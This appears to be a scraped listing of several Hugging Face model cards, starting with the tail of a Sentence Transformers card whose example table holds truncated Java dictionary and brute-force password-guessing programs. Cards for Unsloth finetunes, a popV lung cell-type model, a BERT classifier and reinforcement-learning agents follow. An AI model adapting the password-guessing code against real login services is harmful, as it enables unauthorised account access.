| <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class Dictionary<br>{<br> public static void main (String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> String password="";<br> int requests=0;<br><br> try<br> {<br> <br> FileReader fRead = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader buf = new BufferedReader(fRead);<br><br> password=buf.readLine();<br><br> while (password != null)<br> {<br> <br> if (password.length()<=3)<br> {<br> requests++;<br> if (testPassword(password, startTime, requests))<br> return password;<br> }<br><br> password = buf.readLine();<br><br> }<br> }<br> catch (IOException ioe)<br> {<br><br> }<br><br> return password;<br> }<br><br> private static boolean testPassword(String password, double startTime, int requests)<br> {<br> try<br> {<br> <br> <br> U...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class BruteForce<br>{<br><br> public static void main(String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> char first, second, third;<br> String password="";<br> int requests=0;<br><br> <br> for (int i=65; i<123; i++)<br> {<br> requests++;<br> first = (char) i;<br><br> password = first + "";<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int j=65; j<123; j++)<br> {<br> requests++;<br> second = (char) j;<br><br> password = first + "" + second;<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int k=65; k<123; k++)<br> {<br> requests++;<br> third = (char) k;<br><br> password = first + "" + second + "" + third;<br><br> <br> if (test...</code> | <code><br><br>import java.misc.BASE64Encoder;<br>import java.misc.BASE64Decoder;<br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br><br>public class Dictionary {<br> <br> public Dictionary(String url, String dictionaryFile) {<br> try{<br> this.url = url;<br> this.dictionaryPath = dictionaryFile;<br> InputStream fis = new FileInputStream(this.dictionaryPath);<br> dict = new BufferedReader(new InputStreamReader(fis));<br><br> }catch(IOException ioe){<br> System.out.println("Error opening dictionary file:\n" +ioe);<br> }<br> }<br><br><br> <br> private String url = null;<br> <br> private String dictionaryPath = null;<br> <br> private BufferedReader dict = null;<br> <br> private int attempts = 0;<br> <br> private int passwordSize = 3;<br> <br> public void setPasswordSize(int size){<br> this.passwordSize = size;<br> }<br> <br> public String getNextPassword()throws IOException{<br><br> String line = dict.readLine();<br><br> while(line!=null&&line.length()!=this.passwordSize )<br> line = dict.readLine();<br><br> return line;<br> }<br> <br> publ...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss |
|:------:|:----:|:-------------:|
| 0.0414 | 100 | 1.297 |
| 0.0827 | 200 | 0.3721 |
| 0.1241 | 300 | 0.3752 |
| 0.1655 | 400 | 0.3124 |
| 0.2069 | 500 | 0.3386 |
| 0.2482 | 600 | 0.3278 |
| 0.2896 | 700 | 0.3256 |
| 0.3310 | 800 | 0.318 |
| 0.3724 | 900 | 0.3164 |
| 0.4137 | 1000 | 0.3372 |
| 0.4551 | 1100 | 0.3126 |
| 0.4965 | 1200 | 0.3015 |
| 0.5379 | 1300 | 0.3224 |
| 0.5792 | 1400 | 0.3263 |
| 0.6206 | 1500 | 0.3165 |
| 0.6620 | 1600 | 0.3376 |
| 0.7034 | 1700 | 0.2949 |
| 0.7447 | 1800 | 0.304 |
| 0.7861 | 1900 | 0.3123 |
| 0.8275 | 2000 | 0.2829 |
| 0.8688 | 2100 | 0.2901 |
| 0.9102 | 2200 | 0.2973 |
| 0.9516 | 2300 | 0.3004 |
| 0.9930 | 2400 | 0.3657 |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### CachedMultipleNegativesRankingLoss
```bibtex
@misc{gao2021scaling,
title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup},
author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan},
year={2021},
eprint={2101.06983},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
milliarderdol/blockassist
|
milliarderdol
| 2025-09-23T15:56:29Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"roaring rough scorpion",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-10T13:37:09Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- roaring rough scorpion
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
ahmedsleemtest/hadi-8b-ONE
|
ahmedsleemtest
| 2025-09-23T15:54:16Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:44:13Z |
---
base_model: unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** ahmedsleemtest
- **License:** apache-2.0
- **Finetuned from model :** unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
popV/Tabula_Sapiens2_Lung
|
popV
| 2025-09-23T15:51:26Z | 0 | 0 |
popV
|
[
"popV",
"joblib",
"biology",
"genomics",
"single-cell",
"anndata_version:0.12.2",
"scikit_learn_version:1.7.2",
"organism:Homo sapiens",
"python_version:3.12.8",
"tissue: lung",
"license:cc-by-4.0",
"region:us"
] | null | 2025-09-23T15:50:51Z |
---
library_name: popV
license: cc-by-4.0
tags:
- biology
- genomics
- single-cell
- anndata_version:0.12.2
- scikit_learn_version:1.7.2
- organism:Homo sapiens
- python_version:3.12.8
- popV
- 'tissue: lung'
---
Popular Vote (popV) model for automated cell type annotation of single-cell RNA-seq data. We provide here pretrained models
for plug-in use in your own analysis.
Follow our [tutorial](https://github.com/YosefLab/popV/blob/main/tabula_sapiens_tutorial.ipynb) to learn how to use the model for cell type annotation.
# Model description
Tabula Sapiens is a benchmark, first-draft human cell atlas of over 1.1M cells from 28 organs of 24 normal human subjects. This work is the product of the Tabula Sapiens Consortium. Taking the organs from the same individual controls for genetic background, age, environment, and epigenetic effects, and allows detailed analysis and comparison of cell types that are shared between tissues.
**Link to CELLxGENE**:
Link to the [data](https://cellxgene.cziscience.com/e/0d2ee4ac-05ee-40b2-afb6-ebb584caa867.cxg/) in the CELLxGENE browser for interactive exploration of the data and download of the source data.
**Training Code URL**:
Not provided by uploader.
# Metrics
We provide here accuracies for each of the experts and the ensemble model. The validation set accuracies are
computed on a 10% random subset of the data that was not used for training.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 2 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| capillary endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basal cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 1 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| intermediate monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD4-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD8-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of artery | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| club cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vein endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| lung ciliated cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| alveolar adventitial fibroblast | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| respiratory goblet cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| natural killer cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pericyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| B cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| adventitial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| non-classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| neutrophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of lymphatic vessel | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| bronchial smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mature NK T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasma cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vascular associated smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| myeloid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary ionocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mesothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasmacytoid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| serous cell of epithelium of bronchus | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mast cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
The train accuracies are computed on the training data.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 14833 | 0.96 | 0.98 | 0.97 | 0.98 | 0.00 | 0.95 | 0.97 | 0.96 | 0.98 |
| pulmonary alveolar type 2 cell | 10436 | 0.97 | 0.97 | 0.98 | 0.98 | 0.00 | 0.95 | 0.97 | 0.97 | 0.98 |
| capillary endothelial cell | 6474 | 0.96 | 0.96 | 0.97 | 0.97 | 0.00 | 0.97 | 0.96 | 0.97 | 0.98 |
| basal cell | 3605 | 0.93 | 0.94 | 0.94 | 0.94 | 0.00 | 0.91 | 0.95 | 0.95 | 0.96 |
| pulmonary alveolar type 1 cell | 2824 | 0.96 | 0.98 | 0.96 | 0.97 | 0.00 | 0.98 | 0.98 | 0.97 | 0.98 |
| intermediate monocyte | 2493 | 0.61 | 0.68 | 0.75 | 0.74 | 0.00 | 0.73 | 0.83 | 0.88 | 0.83 |
| CD4-positive, alpha-beta T cell | 1903 | 0.87 | 0.89 | 0.87 | 0.89 | 0.00 | 0.89 | 0.90 | 0.92 | 0.92 |
| CD8-positive, alpha-beta T cell | 1717 | 0.86 | 0.87 | 0.85 | 0.86 | 0.00 | 0.87 | 0.87 | 0.90 | 0.90 |
| endothelial cell of artery | 1584 | 0.76 | 0.81 | 0.83 | 0.82 | 0.00 | 0.83 | 0.82 | 0.83 | 0.85 |
| club cell | 1578 | 0.81 | 0.84 | 0.89 | 0.87 | 0.00 | 0.76 | 0.86 | 0.86 | 0.89 |
| classical monocyte | 1428 | 0.59 | 0.61 | 0.66 | 0.65 | 0.00 | 0.74 | 0.83 | 0.93 | 0.82 |
| basophil | 1193 | 0.98 | 0.98 | 0.99 | 0.99 | 0.00 | 0.98 | 0.98 | 0.98 | 0.99 |
| vein endothelial cell | 1187 | 0.79 | 0.83 | 0.85 | 0.84 | 0.00 | 0.84 | 0.86 | 0.88 | 0.87 |
| lung ciliated cell | 1075 | 0.96 | 0.97 | 0.98 | 0.98 | 0.00 | 0.97 | 0.98 | 0.97 | 0.98 |
| alveolar adventitial fibroblast | 1002 | 0.88 | 0.86 | 0.86 | 0.90 | 0.00 | 0.94 | 0.97 | 0.96 | 0.95 |
| respiratory goblet cell | 937 | 0.83 | 0.87 | 0.87 | 0.85 | 0.00 | 0.76 | 0.88 | 0.88 | 0.90 |
| natural killer cell | 928 | 0.91 | 0.92 | 0.91 | 0.92 | 0.00 | 0.92 | 0.95 | 0.96 | 0.96 |
| pericyte | 681 | 0.81 | 0.89 | 0.92 | 0.92 | 0.00 | 0.94 | 0.97 | 0.97 | 0.97 |
| B cell | 596 | 0.97 | 0.96 | 0.97 | 0.97 | 0.00 | 0.98 | 0.99 | 0.99 | 0.99 |
| adventitial cell | 533 | 0.81 | 0.82 | 0.79 | 0.82 | 0.00 | 0.90 | 0.96 | 0.96 | 0.93 |
| non-classical monocyte | 469 | 0.26 | 0.12 | 0.24 | 0.17 | 0.00 | 0.38 | 0.72 | 0.79 | 0.63 |
| monocyte | 464 | 0.42 | 0.33 | 0.50 | 0.48 | 0.00 | 0.62 | 0.78 | 0.87 | 0.75 |
| neutrophil | 338 | 0.95 | 0.97 | 0.96 | 0.95 | 0.00 | 0.96 | 0.97 | 0.95 | 0.99 |
| endothelial cell of lymphatic vessel | 285 | 0.98 | 0.98 | 0.97 | 0.96 | 0.00 | 0.97 | 0.99 | 0.99 | 0.98 |
| bronchial smooth muscle cell | 201 | 0.52 | 0.59 | 0.67 | 0.58 | 0.00 | 0.79 | 0.93 | 0.95 | 0.92 |
| mature NK T cell | 146 | 0.35 | 0.19 | 0.38 | 0.33 | 0.00 | 0.64 | 0.80 | 0.88 | 0.86 |
| plasma cell | 139 | 0.75 | 0.85 | 0.89 | 0.95 | 0.00 | 0.94 | 0.96 | 0.95 | 0.94 |
| vascular associated smooth muscle cell | 113 | 0.44 | 0.63 | 0.74 | 0.61 | 0.00 | 0.84 | 0.94 | 0.96 | 0.93 |
| myeloid dendritic cell | 29 | 0.00 | 0.12 | 0.76 | 0.60 | 0.00 | 0.65 | 0.87 | 0.97 | 0.95 |
| pulmonary ionocyte | 23 | 0.00 | 0.89 | 0.88 | 0.67 | 0.00 | 0.71 | 0.92 | 0.90 | 0.96 |
| mesothelial cell | 17 | 0.36 | 0.71 | 0.74 | 0.77 | 0.00 | 0.47 | 0.85 | 0.87 | 0.74 |
| plasmacytoid dendritic cell | 15 | 0.97 | 0.00 | 1.00 | 0.94 | 0.00 | 0.65 | 1.00 | 1.00 | 1.00 |
| serous cell of epithelium of bronchus | 13 | 0.00 | 0.38 | 0.00 | 0.38 | 0.00 | 0.28 | 0.79 | 0.93 | 0.63 |
| mast cell | 3 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.30 | 1.00 | 0.75 | 0.80 |
</details>
# References
Tabula Sapiens reveals transcription factor expression, senescence effects, and sex-specific features in cell types from 28 human organs and tissues, The Tabula Sapiens Consortium; bioRxiv, doi: https://doi.org/10.1101/2024.12.03.626516
|
BFCmath/xlmr-vinli-finetune_finetuned
|
BFCmath
| 2025-09-23T15:49:37Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"xlm-roberta",
"text-classification",
"generated_from_trainer",
"base_model:lyle49/xlmr-vinli-finetune",
"base_model:finetune:lyle49/xlmr-vinli-finetune",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T14:58:15Z |
---
library_name: transformers
license: mit
base_model: lyle49/xlmr-vinli-finetune
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: xlmr-vinli-finetune_finetuned
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlmr-vinli-finetune_finetuned
This model is a fine-tuned version of [lyle49/xlmr-vinli-finetune](https://huggingface.co/lyle49/xlmr-vinli-finetune) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7057
- Accuracy: 0.7664
- F1 Macro: 0.7681
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 20
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Macro |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:--------:|
| 0.7981 | 1.0 | 175 | 0.7080 | 0.7214 | 0.7243 |
| 0.6215 | 2.0 | 350 | 0.6871 | 0.7429 | 0.7403 |
| 0.499 | 3.0 | 525 | 0.7057 | 0.7664 | 0.7681 |
| 0.3883 | 4.0 | 700 | 0.7750 | 0.7529 | 0.7542 |
| 0.333 | 5.0 | 875 | 0.8505 | 0.7443 | 0.7439 |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.2
|
gouki510/gemma2-2b-base-marged
|
gouki510
| 2025-09-23T15:49:31Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"base_model:unsloth/gemma-2-2b",
"base_model:finetune:unsloth/gemma-2-2b",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:47:17Z |
---
base_model: unsloth/gemma-2-2b
tags:
- text-generation-inference
- transformers
- unsloth
- gemma2
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** gouki510
- **License:** apache-2.0
- **Finetuned from model :** unsloth/gemma-2-2b
This gemma2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
tstenborg/ppo-Pyramids
|
tstenborg
| 2025-09-23T15:47:59Z | 0 | 0 |
ml-agents
|
[
"ml-agents",
"tensorboard",
"onnx",
"Pyramids",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-Pyramids",
"region:us"
] |
reinforcement-learning
| 2025-09-23T15:43:35Z |
---
library_name: ml-agents
tags:
- Pyramids
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-Pyramids
---
# **ppo** Agent playing **Pyramids**
This is a trained model of a **ppo** agent playing **Pyramids**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how works ML-Agents:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Step 1: Find your model_id: tstenborg/ppo-Pyramids
3. Step 2: Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
aayush7511/cleaned_context_all_sentences
|
aayush7511
| 2025-09-23T15:45:22Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T15:44:45Z |
---
library_name: transformers
license: apache-2.0
base_model: google-bert/bert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- precision
- recall
model-index:
- name: cleaned_context_all_sentences
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# cleaned_context_all_sentences
This model is a fine-tuned version of [google-bert/bert-base-uncased](https://huggingface.co/google-bert/bert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3971
- Accuracy: 0.847
- Auc: 0.774
- Precision: 0.667
- Recall: 0.296
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Auc | Precision | Recall |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:-----:|:---------:|:------:|
| 0.4744 | 1.0 | 321 | 0.4293 | 0.833 | 0.712 | 0.7 | 0.122 |
| 0.4415 | 2.0 | 642 | 0.4169 | 0.824 | 0.745 | 0.533 | 0.139 |
| 0.4278 | 3.0 | 963 | 0.4276 | 0.833 | 0.745 | 0.722 | 0.113 |
| 0.4106 | 4.0 | 1284 | 0.4071 | 0.844 | 0.761 | 0.653 | 0.278 |
| 0.4081 | 5.0 | 1605 | 0.4005 | 0.844 | 0.763 | 0.623 | 0.33 |
| 0.4073 | 6.0 | 1926 | 0.3974 | 0.841 | 0.766 | 0.633 | 0.27 |
| 0.3931 | 7.0 | 2247 | 0.3953 | 0.849 | 0.774 | 0.705 | 0.27 |
| 0.3919 | 8.0 | 2568 | 0.3965 | 0.849 | 0.769 | 0.661 | 0.322 |
| 0.3862 | 9.0 | 2889 | 0.4061 | 0.842 | 0.773 | 0.706 | 0.209 |
| 0.3794 | 10.0 | 3210 | 0.3971 | 0.847 | 0.774 | 0.667 | 0.296 |
### Framework versions
- Transformers 4.55.4
- Pytorch 2.8.0
- Datasets 4.0.0
- Tokenizers 0.21.4
|
bita-rhz/ppo-LunarLander-v2
|
bita-rhz
| 2025-09-23T15:44:54Z | 0 | 0 |
stable-baselines3
|
[
"stable-baselines3",
"LunarLander-v2",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] |
reinforcement-learning
| 2025-09-23T15:41:50Z |
---
library_name: stable-baselines3
tags:
- LunarLander-v2
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
